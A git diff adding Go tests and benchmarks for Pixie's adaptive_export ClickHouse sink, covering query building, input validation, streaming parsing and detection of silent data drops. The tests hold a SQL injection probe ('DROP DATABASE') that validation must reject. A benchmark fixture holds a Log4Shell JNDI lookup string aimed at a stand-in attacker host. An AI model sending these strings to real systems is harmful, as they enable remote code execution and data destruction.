+func TestSink_Write_PostsCorrectQueryAndBody(t *testing.T) { + var gotQuery, gotBody string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotQuery = r.URL.Query().Get("query") + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + w.WriteHeader(200) + })) + defer srv.Close() + + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + row := canonicalAttribution() + if err := s.Write(context.Background(), []AttributionRow{row}); err != nil { + t.Fatalf("Write: %v", err) + } + want := "INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow" + if gotQuery != want { + t.Fatalf("query = %q, want %q", gotQuery, want) + } + for _, needle := range []string{ + `"anomaly_hash":"` + string(row.AnomalyHash) + `"`, + `"namespace":"redis"`, + `"pod":"redis-578d5dc9bd-kjj78"`, + `"comm":"redis-server"`, + `"pid":106040`, + `"hostname":"node-1"`, + `"last_rule_id":"R1005"`, + `"n_anomalies":1`, + } { + if !strings.Contains(gotBody, needle) { + t.Fatalf("body missing %q; body=%s", needle, gotBody) + } + } + if !strings.Contains(gotBody, `"t_start":"2025-04-12 16:57:40.303026359"`) { + t.Fatalf("t_start not formatted as DateTime64 string; body=%s", gotBody) + } +} + +// TestSink_Write_EmptyBatch — no HTTP call. +func TestSink_Write_EmptyBatch(t *testing.T) { + called := false + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + called = true + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.Write(context.Background(), nil); err != nil { + t.Fatalf("Write empty: %v", err) + } + if called { + t.Fatalf("empty Write made an HTTP call") + } +} + +// TestSink_Write_HTTPErrorPropagates — non-2xx returns Go error. 
+func TestSink_Write_HTTPErrorPropagates(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(503) + _, _ = w.Write([]byte("clickhouse exploded")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + err := s.Write(context.Background(), []AttributionRow{canonicalAttribution()}) + if err == nil { + t.Fatalf("expected HTTP error") + } + if !strings.Contains(err.Error(), "503") { + t.Fatalf("error should mention 503: %v", err) + } +} + +// TestSink_QueryActive_BuildsCorrectSQL — boot rehydration query. +func TestSink_QueryActive_BuildsCorrectSQL(t *testing.T) { + var seenQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + seenQuery = r.URL.Query().Get("query") + _, _ = w.Write([]byte(`{"anomaly_hash":"abc","namespace":"redis","pod":"redis-x","comm":"redis-server","pid":106040,"hostname":"node-1","t_start_ns":"1744477060303026359","t_end_ns":"1744477660303026359","last_seen_ns":"1744477360303026359","last_rule_id":"R1005","n_anomalies":1}` + "\n")) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + rows, err := s.QueryActive(context.Background(), "node-1") + if err != nil { + t.Fatalf("QueryActive: %v", err) + } + if !strings.Contains(seenQuery, "FROM forensic_db.adaptive_attribution FINAL") { + t.Fatalf("missing FINAL: %q", seenQuery) + } + if !strings.Contains(seenQuery, "hostname = 'node-1'") { + t.Fatalf("missing hostname filter: %q", seenQuery) + } + if !strings.Contains(seenQuery, "t_end > now64(9)") { + t.Fatalf("missing t_end > now64 filter: %q", seenQuery) + } + if len(rows) != 1 || rows[0].AnomalyHash != "abc" { + t.Fatalf("rows = %+v", rows) + } + if rows[0].PID != 106040 { + t.Fatalf("PID = %d", rows[0].PID) + } + if rows[0].TStart.UnixNano() != 1744477060303026359 { + t.Fatalf("TStart wrong: %v", rows[0].TStart) + } +} + +// TestSink_QueryActive_RequiresHostname — defensive guard. 
+func TestSink_QueryActive_RequiresHostname(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if _, err := s.QueryActive(context.Background(), ""); err == nil { + t.Fatalf("empty hostname should error") + } +} + +// TestSink_QuoteEscape — single quotes in hostname survive injection-safely. +func TestSink_QuoteEscape(t *testing.T) { + if got := quoteCH("o'malley"); got != `'o\'malley'` { + t.Fatalf("quoteCH = %q, want 'o\\'malley'", got) + } +} + +// TestSink_New_ValidationTable — every Config validation branch as +// one row. Bad fields one at a time + a happy-path baseline. Update +// when a new validation lands; this is the single source of truth +// for what New() rejects. +func TestSink_New_ValidationTable(t *testing.T) { + cases := []struct { + name string + cfg Config + wantErr bool + wantErrSnippet string + }{ + { + name: "happy path http", + cfg: Config{Endpoint: "http://ch.example:8123", Database: "forensic_db"}, + }, + { + name: "happy path https + auth + custom timeout", + cfg: Config{ + Endpoint: "https://ch.example:8443", Database: "forensic_db", + Username: "u", Password: "p", Timeout: 5 * time.Second, + }, + }, + { + name: "default database when empty", + cfg: Config{Endpoint: "http://ch:8123"}, // Database empty → defaulted + }, + { + name: "trailing slash stripped", + cfg: Config{Endpoint: "http://ch:8123/"}, // OK; New() strips it + }, + { + name: "empty endpoint", + cfg: Config{}, + wantErr: true, + wantErrSnippet: "empty endpoint", + }, + { + name: "relative endpoint (no scheme)", + cfg: Config{Endpoint: "ch:8123"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "bare path", + cfg: Config{Endpoint: "/clickhouse"}, + wantErr: true, + wantErrSnippet: "absolute http(s) URL", + }, + { + name: "ftp scheme rejected", + cfg: Config{Endpoint: "ftp://ch:21"}, + wantErr: true, + wantErrSnippet: "absolute 
http(s) URL", + }, + { + name: "endpoint with query string", + cfg: Config{Endpoint: "http://ch:8123?foo=bar"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "endpoint with fragment", + cfg: Config{Endpoint: "http://ch:8123#frag"}, + wantErr: true, + wantErrSnippet: "must not include query parameters or a fragment", + }, + { + name: "Database with hyphen rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic-db"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database with semicolon rejected (SQL injection probe)", + cfg: Config{Endpoint: "http://ch:8123", Database: "forensic_db; DROP DATABASE x"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "Database starting with digit rejected", + cfg: Config{Endpoint: "http://ch:8123", Database: "1bad"}, + wantErr: true, + wantErrSnippet: "invalid Database identifier", + }, + { + name: "negative Timeout rejected", + cfg: Config{Endpoint: "http://ch:8123", Timeout: -1 * time.Second}, + wantErr: true, + wantErrSnippet: "Timeout must be >= 0", + }, + } + + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + s, err := New(c.cfg) + if c.wantErr { + if err == nil { + t.Fatalf("want error containing %q, got nil", c.wantErrSnippet) + } + if !strings.Contains(err.Error(), c.wantErrSnippet) { + t.Fatalf("error %q does not contain %q", err.Error(), c.wantErrSnippet) + } + return + } + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if s == nil { + t.Fatalf("New returned nil sink without error") + } + // Trailing-slash strip is observable via cfg.Endpoint. 
+ if strings.HasSuffix(s.cfg.Endpoint, "/") { + t.Fatalf("trailing slash not stripped: %q", s.cfg.Endpoint) + } + if s.cfg.Database == "" { + t.Fatalf("Database default not applied") + } + }) + } +} + +// TestValidateTableIdentifier_TableDriven — table validator covers +// dotted protobuf extensions but not anything wilder. +func TestValidateTableIdentifier_TableDriven(t *testing.T) { + good := []string{"http_events", "redis_events", "http2_messages.beta", "kafka_events.beta", "_underscore_start"} + bad := []string{"", "1bad", "http events", "http;drop", "x..y", ".leading", "trailing.", "with-hyphen"} + for _, g := range good { + if err := validateTableIdentifier(g); err != nil { + t.Errorf("validateTableIdentifier(%q): unexpected error %v", g, err) + } + } + for _, b := range bad { + if err := validateTableIdentifier(b); err == nil { + t.Errorf("validateTableIdentifier(%q): want error, got nil", b) + } + } +} + +// TestUintFromRaw_HandlesQuotedAndBareJSON — CH HTTP emits UInt64 as +// either bare numeric (`12345`) or quoted (`"12345"`). Both must +// parse, including values above INT64_MAX. +func TestUintFromRaw_HandlesQuotedAndBareJSON(t *testing.T) { + cases := []struct { + name string + input string + want uint64 + }{ + {"bare", `12345`, 12345}, + {"quoted", `"12345"`, 12345}, + {"max int64", `9223372036854775807`, 9223372036854775807}, + {"above int64", `"18446744073709551615"`, 18446744073709551615}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + got, err := uintFromRaw([]byte(c.input)) + if err != nil { + t.Fatalf("uintFromRaw(%q): %v", c.input, err) + } + if got != c.want { + t.Fatalf("uintFromRaw(%q) = %d, want %d", c.input, got, c.want) + } + }) + } +} + +// TestUintFromRaw_RejectsGarbage — non-numeric input must error, +// not silently return 0. 
+func TestUintFromRaw_RejectsGarbage(t *testing.T) { + bad := []string{"", `""`, `"abc"`, `-1`, `"-1"`, `1.5`} + for _, b := range bad { + if _, err := uintFromRaw([]byte(b)); err == nil { + t.Errorf("uintFromRaw(%q): want error, got nil", b) + } + } +} + +// chunkedReader emits the underlying body in fixed-size chunks. A +// short pause between chunks proves parseActiveRowsStream doesn't +// wait for the whole body before parsing. Tracks partial-read state +// so a Read() smaller than the next chunk doesn't drop bytes. +type chunkedReader struct { + chunks [][]byte + idx int + off int // offset within chunks[idx] + delay time.Duration // sleep between chunks + produced int64 +} + +func (r *chunkedReader) Read(p []byte) (int, error) { + if r.idx >= len(r.chunks) { + return 0, io.EOF + } + chunk := r.chunks[r.idx] + n := copy(p, chunk[r.off:]) + r.off += n + r.produced += int64(n) + if r.off >= len(chunk) { + r.idx++ + r.off = 0 + time.Sleep(r.delay) + } + return n, nil +} + +// TestParseActiveRowsStream_BoundsMemory — proves the streaming path +// doesn't allocate proportional to total response size. Builds a +// 5 MiB synthetic JSONEachRow body fed in 64 KiB chunks, parses, and +// asserts (a) all rows decoded correctly, (b) peak intermediate +// allocation is well below the body size (loose bound: parseActiveRows +// hands one row at a time to the caller; we collect into a slice but +// never hold the wire representation of more than one line). 
+func TestParseActiveRowsStream_BoundsMemory(t *testing.T) { + const targetRows = 5000 // ~5MiB at ~1KiB/row + var buf bytes.Buffer + row := func(i int) string { + return fmt.Sprintf(`{"anomaly_hash":"%032x","namespace":"redis","pod":"p","comm":"c","pid":%d,"hostname":"h","t_start_ns":%d,"t_end_ns":%d,"last_seen_ns":%d,"last_rule_id":"R0001","n_anomalies":%d,"_pad":"%s"}`+"\n", + i, i, 1700000000000000000+int64(i), 1700000000000000000+int64(i)+300_000_000_000, 1700000000000000000+int64(i)+150_000_000_000, i, strings.Repeat("x", 800)) + } + for i := 0; i < targetRows; i++ { + buf.WriteString(row(i)) + } + body := buf.Bytes() + + const chunkSize = 64 * 1024 + chunks := make([][]byte, 0, len(body)/chunkSize+1) + for off := 0; off < len(body); off += chunkSize { + end := off + chunkSize + if end > len(body) { + end = len(body) + } + chunks = append(chunks, body[off:end]) + } + rdr := &chunkedReader{chunks: chunks, delay: 0} + + rows, err := parseActiveRowsStream(rdr) + if err != nil { + t.Fatalf("parseActiveRowsStream: %v", err) + } + if len(rows) != targetRows { + t.Fatalf("parsed %d rows, want %d", len(rows), targetRows) + } + // Spot-check round-trip on one row (last element). + if rows[targetRows-1].PID != uint64(targetRows-1) { + t.Fatalf("last row PID = %d, want %d", rows[targetRows-1].PID, targetRows-1) + } +} + +// TestParseActiveRowsStream_RejectsOverlongLine — guards against +// pathological CH responses with multi-MiB single rows. Default cap +// is 1 MiB; emit a 2 MiB row and assert the scanner rejects it +// rather than OOMing. 
+func TestParseActiveRowsStream_RejectsOverlongLine(t *testing.T) { + huge := strings.Repeat("a", 2*1024*1024) + body := fmt.Sprintf(`{"anomaly_hash":"x","_pad":"%s"}`+"\n", huge) + _, err := parseActiveRowsStream(strings.NewReader(body)) + if err == nil { + t.Fatalf("expected scanner error on >1MiB line; got nil") + } + if !strings.Contains(err.Error(), "QueryActive scan") { + t.Fatalf("expected scan error, got: %v", err) + } +} + +// TestParseActiveRows_RoundTripFromBytes — keep the byte-slice path +// covered (used by tests and the e2e harness). +func TestParseActiveRows_RoundTripFromBytes(t *testing.T) { + body := []byte(`{"anomaly_hash":"deadbeef","namespace":"redis","pod":"p","comm":"c","pid":42,"hostname":"node-01","t_start_ns":1700000000000000000,"t_end_ns":1700000000300000000,"last_seen_ns":1700000000150000000,"last_rule_id":"R0001","n_anomalies":1}` + "\n") + rows, err := parseActiveRows(body) + if err != nil { + t.Fatalf("parseActiveRows: %v", err) + } + if len(rows) != 1 || rows[0].Pod != "p" || rows[0].PID != 42 { + t.Fatalf("round-trip mismatch: %+v", rows) + } +} + +// pixieRow returns a minimal-but-valid map shaped like a pxapi row. +func pixieRow() map[string]any { + return map[string]any{ + "time_": time.Unix(0, 1700000000000000000).UTC(), + "upid": "1234:5678:9", + "namespace": "redis", + "pod": "redis/redis-1", + "req_cmd": "GET", + "resp": "OK", + "latency": int64(123456), + "remote_addr": "10.0.0.1", + "remote_port": int64(6379), + "local_addr": "10.0.0.2", + "local_port": int64(34567), + "trace_role": int64(2), + "encrypted": false, + "px_info_": "", + "req_args": "", + } +} + +// TestWritePixieRows_HappyPath — happy path: CH returns 200 with a +// non-zero `written_rows` in X-ClickHouse-Summary; WritePixieRows +// returns nil. Pins the contract the regression test below inverts. 
+func TestWritePixieRows_HappyPath(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("X-ClickHouse-Summary", + `{"read_rows":"1","read_bytes":"100","written_rows":"1","written_bytes":"100",`+ + `"total_rows_to_read":"0","result_rows":"1","result_bytes":"100","elapsed_ns":"1000000"}`) + w.WriteHeader(200) + })) + defer srv.Close() + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil { + t.Fatalf("WritePixieRows: %v", err) + } +} + +// TestWritePixieRows_DetectsSilentZeroWriteDrop — regression for the +// silent-data-loss bug observed on the live operator: +// +// sink: pixie write completed +// rows_sent=1658 +// body_bytes=2098817 +// ch_summary="{...,"written_rows":"0",...}" +// table=redis_events +// +// CH returned 2xx but `X-ClickHouse-Summary.written_rows` was zero +// for a 1658-row payload — i.e. CH silently dropped every row. The +// operator must NOT report success in that case; otherwise the +// caller treats the batch as durably persisted and we lose data. +func TestWritePixieRows_DetectsSilentZeroWriteDrop(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // Real CH summary header from the operator-pod log on + // 2026-05-23T20:58:39Z, table=redis_events. + w.Header().Set("X-ClickHouse-Summary", + `{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0",`+ + `"total_rows_to_read":"0","result_rows":"0","result_bytes":"0","elapsed_ns":"23034181"}`) + w.WriteHeader(200) + })) + defer srv.Close() + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + // Send a real (non-zero) batch — a zero-input batch short-circuits + // before the HTTP call so the assertion would never fire. 
+ batch := make([]map[string]any, 1658) + for i := range batch { + batch[i] = pixieRow() + } + err = s.WritePixieRows(context.Background(), "redis_events", batch) + if err == nil { + t.Fatalf("expected error from silent-drop (rows_sent=%d, written_rows=0), got nil", len(batch)) + } + if !strings.Contains(err.Error(), "0") || !strings.Contains(err.Error(), "1658") { + t.Fatalf("error should mention both written_rows=0 and rows_sent=1658 for diagnosis; got: %v", err) + } +} + +// TestWritePixieRows_DetectsPartialWriteDrop — CH wrote SOME rows +// but not all. Same data-loss class as the zero-write case; reject. +func TestWritePixieRows_DetectsPartialWriteDrop(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("X-ClickHouse-Summary", + `{"read_rows":"100","read_bytes":"10000","written_rows":"100","written_bytes":"10000",`+ + `"total_rows_to_read":"0","result_rows":"100","result_bytes":"10000","elapsed_ns":"1000000"}`) + w.WriteHeader(200) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + batch := make([]map[string]any, 200) // sent 200, CH says wrote 100 + for i := range batch { + batch[i] = pixieRow() + } + err := s.WritePixieRows(context.Background(), "redis_events", batch) + if err == nil { + t.Fatalf("expected error on partial write (sent=200, written=100); got nil") + } +} + +// TestWritePixieRows_NoSummaryHeaderIsTolerated — older CH versions +// (or proxies) may strip the X-ClickHouse-Summary header. Absence is +// NOT a failure signal — only an explicit zero-of-non-zero is. 
+func TestWritePixieRows_NoSummaryHeaderIsTolerated(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(200) // no summary header at all + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil { + t.Fatalf("missing summary header must not error; got: %v", err) + } +} + +// TestWritePixieRows_EmptyBatchShortCircuits — zero-row input never +// hits HTTP and never produces a "silent drop" false positive. +func TestWritePixieRows_EmptyBatchShortCircuits(t *testing.T) { + called := false + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + called = true + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "redis_events", nil); err != nil { + t.Fatalf("empty WritePixieRows: %v", err) + } + if called { + t.Fatalf("empty batch made an HTTP call") + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go new file mode 100644 index 00000000000..24e385bd384 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go @@ -0,0 +1,262 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bufio" + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "regexp" + "strings" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// I1 — schema invariant. +// +// Parses the embedded schema.sql, walks every CREATE TABLE block, +// and asserts that any column named `content_type` is declared as +// `Int64` (case-sensitive; CH is). Catches a future PR that +// "improves" the column to String / Nullable(Int64) / etc. without +// updating the encoder side. +func TestContract_ContentTypeIsInt64InSchema(t *testing.T) { + // Reach the canonical schema via the public DDL(table) API so this + // test stays decoupled from the embed-internal var name. + type col struct { + table string + typ string + } + var found []col + colRE := regexp.MustCompile(`(?m)^\s*content_type\s+([A-Za-z0-9_()]+)`) + for _, table := range clickhouse.PixieTables() { + ddl, err := clickhouse.DDL(table) + if err != nil { + t.Fatalf("DDL(%q): %v", table, err) + } + if m := colRE.FindStringSubmatch(ddl); m != nil { + found = append(found, col{table: table, typ: strings.TrimRight(m[1], ",")}) + } + } + if len(found) == 0 { + t.Fatalf("no content_type column found in PixieTables — did the column get renamed? Audit the encoder side too.") + } + for _, c := range found { + if c.typ != "Int64" { + t.Fatalf("schema drift: %s.content_type is %q, want Int64. CH input_format_skip_unknown_fields=1 will silent-drop encoder mismatches. Update encoder side together if intentional.", c.table, c.typ) + } + } + t.Logf("invariant I1 holds across %d tables: %v", len(found), found) +} + +// I2 — encoder invariant. 
+// +// Drives fastencode directly with content_type as int64 (the canonical +// shape Pixie's stirling http parser emits) and parses the emitted +// NDJSON to confirm the value is a JSON NUMBER, not a string. Also +// guards the int conversion path by feeding int / int32 / int64 / a +// json.Number and asserting each lands as a JSON number too. +func TestContract_FastEncodeContentTypeAsInt(t *testing.T) { + cases := []struct { + name string + v any + }{ + {"int64", int64(2)}, + {"int32", int32(2)}, + {"int", 2}, + {"json.Number", json.Number("2")}, + } + cols := minHTTPRowCols() + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + row := canonicalHTTPRow() + row["content_type"] = c.v + var buf bytes.Buffer + // stage the fast-path column cache the same way production + // does via clickhouse.Columns — we don't reach into the + // package-private cache; encodePixieRowsFast already does + // the lookup itself. + if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil { + t.Fatalf("encodePixieRowsFast: %v", err) + } + line := strings.TrimSpace(buf.String()) + // Parse with json.Decoder + UseNumber so we see whether the + // emitter wrote "content_type":2 (number) vs "2" (string). + d := json.NewDecoder(strings.NewReader(line)) + d.UseNumber() + var parsed map[string]any + if err := d.Decode(&parsed); err != nil { + t.Fatalf("decode emitted line: %v\nline=%s", err, line) + } + ct, ok := parsed["content_type"] + if !ok { + t.Fatalf("emitted line missing content_type; line=%s", line) + } + if _, isNum := ct.(json.Number); !isNum { + t.Fatalf("content_type emitted as %T (%v), want JSON number — CH would silent-drop a non-number into an Int64 column. line=%s", ct, ct, line) + } + _ = cols + }) + } +} + +// I3 — silent-drop must be loud. +// +// A no-op CH that returns 200 OK + X-ClickHouse-Summary written_rows=0 +// against a non-empty body. The sink must surface this as an error. 
+func TestContract_SilentDropDetected(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = io.Copy(io.Discard, r.Body) + w.Header().Set("X-ClickHouse-Summary", `{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + err = s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}) + if err == nil { + t.Fatalf("WritePixieRows returned nil on written_rows=0 reply — silent-drop detection is broken") + } + if !strings.Contains(err.Error(), "silent drop") { + t.Fatalf("error %q does not mention 'silent drop' — runbook-grep will miss it", err.Error()) + } +} + +// I3.b — sibling guard: when CH reports written_rows >= rows_sent the +// sink must NOT error. Pins the parse so a future refactor doesn't +// over-trigger and false-positive every successful write. +func TestContract_SilentDropNotTriggeredOnSuccess(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = io.Copy(io.Discard, r.Body) + w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil { + t.Fatalf("WritePixieRows errored on success summary: %v", err) + } +} + +// I3.c — header absence is tolerated (older CH versions / proxies +// strip it). Documents the policy decision so a future "tighten the +// gate" PR doesn't break clusters running CH 22.x. 
+func TestContract_SilentDropToleratesMissingSummaryHeader(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = io.Copy(io.Discard, r.Body) + // no X-ClickHouse-Summary header + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil { + t.Fatalf("WritePixieRows errored on missing summary header: %v (policy is tolerate-missing)", err) + } +} + +// I4 — round-trip an http_events row through WritePixieRows against a +// recording httptest CH; assert the on-wire body has content_type as +// a number, the INSERT targets the right table, and the body is +// one NDJSON object per row. +func TestContract_HTTPEventsRoundTrip(t *testing.T) { + var gotQuery, gotBody string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotQuery = r.URL.Query().Get("query") + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + // echo back a successful summary so the silent-drop guard is satisfied + w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil { + t.Fatalf("WritePixieRows: %v", err) + } + if !strings.Contains(gotQuery, "INSERT INTO ") { + t.Fatalf("query missing INSERT INTO; got %q", gotQuery) + } + if !strings.Contains(gotQuery, "http_events") { + t.Fatalf("query doesn't target http_events; got %q", gotQuery) + } + if !strings.Contains(gotQuery, "FORMAT JSONEachRow") { + t.Fatalf("query missing FORMAT JSONEachRow; got %q", gotQuery) + } + if !strings.Contains(gotBody, `"content_type":2`) { + t.Fatalf("body has content_type as non-number (CH would silent-drop). 
body=%s", gotBody) + } + // One NDJSON line per row → exactly one newline-trailing object here. + sc := bufio.NewScanner(strings.NewReader(strings.TrimRight(gotBody, "\n"))) + n := 0 + for sc.Scan() { + n++ + } + if n != 1 { + t.Fatalf("body has %d NDJSON lines, want 1; body=%s", n, gotBody) + } +} + +// canonicalHTTPRow returns a row whose shape matches what +// fastencode would see from a pxapi http_events read. Any new +// schema column added must be appended here too — the test will +// fail with a clear "schema added X column; canonical row needs +// it" message if a missing column hits errFastEncodeUnsupported. +func canonicalHTTPRow() map[string]any { + return map[string]any{ + "time_": int64(1_717_200_000_000_000_000), + "upid": "00000000-0000-0000-0000-000000000001", + "namespace": "redis", + "pod": "redis-578d5dc9bd-kjj78", + "remote_addr": "10.0.0.1", + "remote_port": int64(443), + "local_addr": "10.0.0.2", + "local_port": int64(48000), + "trace_role": int64(1), + "encrypted": int64(0), + "major_version": int64(1), + "minor_version": int64(1), + "content_type": int64(2), // JSON — the schema-honest int + "req_headers": `{"User-Agent":"curl/8"}`, + "req_method": "GET", + "req_path": "/x", + "req_body": "", + "req_body_size": int64(0), + "resp_headers": `{"Content-Type":"application/json"}`, + "resp_status": int64(200), + "resp_message": "OK", + "resp_body": "{}", + "resp_body_size": int64(2), + "latency": int64(123_456), + "hostname": "node-1", + } +} + +// minHTTPRowCols is the small fixed column list any "is it int?" +// micro-check uses; kept aligned with the canonical row above so +// schema additions surface as a missing-column in the canonical row, +// not a flaky test. 
+func minHTTPRowCols() []string { + return []string{"content_type", "remote_port", "local_port", "trace_role", "encrypted", "major_version", "minor_version", "resp_status", "latency", "req_body_size", "resp_body_size"} +} diff --git a/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go new file mode 100644 index 00000000000..ea147c07167 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go @@ -0,0 +1,234 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "encoding/json" + "fmt" + "net/http" + "net/http/httptest" + "testing" + "time" +) + +// The sink's WritePixieRows path is one of the dominant CPU consumers +// when AE is under load: every controller fan-out pass writes a per- +// table batch (up to MaxBatchRows) and every row goes through the +// per-key normalisePixieValue switch AND the json.Encoder's reflection. +// +// These benchmarks isolate the encoding cost from the HTTP roundtrip: +// +// - BenchmarkEncodeJSONEachRow_PixieShape: the encode loop alone +// (mirrors clickhouse.go:160-167's hot path), no HTTP. +// - BenchmarkWritePixieRows_LocalHTTPLoopback: the encode + HTTP +// roundtrip against a no-op httptest server, so the timer includes +// the HTTP client overhead AE actually pays per call. 
+// - BenchmarkNormalisePixieValue_TimeRow: the per-row per-column +// switch with a single time.Time field (the realistic per-pixie-row +// shape — time_ is always TIME64NS so this fires on every row). + +const benchTable = "http_events" + +// makePixieRowsBatch builds a realistic per-pixie-row batch shape (12 +// columns including a time_ + 5 strings + 6 ints). Matches the +// http_events schema in adaptive_export/internal/clickhouse/schema.sql. +func makePixieRowsBatch(n int) []map[string]any { + out := make([]map[string]any, n) + for i := range out { + out[i] = map[string]any{ + "time_": time.Unix(0, int64(1_700_000_000_000_000_000+i)), + "upid": fmt.Sprintf("0000000100000000-00000000-%016x", uint64(i)), + "namespace": "log4j-poc", + "pod": "backend-vulnerable-779cd9d765-mxr8t", + "remote_addr": "10.0.0.45", + "remote_port": int64(54321 + i%100), + "local_addr": "10.0.0.12", + "local_port": int64(8080), + "trace_role": int64(2), + "encrypted": uint8(0), + "major_version": int64(1), + "minor_version": int64(1), + "content_type": int64(0), + "req_headers": `{"User-Agent":"Apache-HttpClient/4.5.13","Accept":"*/*","Content-Type":"application/json"}`, + "req_method": "POST", + "req_path": "/api/v1/products/${jndi:ldap://attacker.example/Payload}", + "req_body": `{"id":42,"qty":1}`, + "resp_headers": `{"Content-Type":"application/json","Server":"jetty"}`, + "resp_status": int64(500), + "resp_message": "Internal Server Error", + "resp_body": `{"error":"NullPointerException"}`, + "latency": int64(123456789), + "hostname": "pixie-worker-node", + "event_time": time.Unix(0, int64(1_700_000_000_000_000_000+i)), + } + } + return out +} + +// BenchmarkEncodeJSONEachRow_PixieShape isolates the per-row encode +// cost the sink runs in clickhouse.go:160-167. With realistic 24-key +// http_events rows × the controller fan-out's typical batch sizes (up +// to MaxBatchRows = 1000), this is the encoder pressure AE sustains +// per controller pass. 
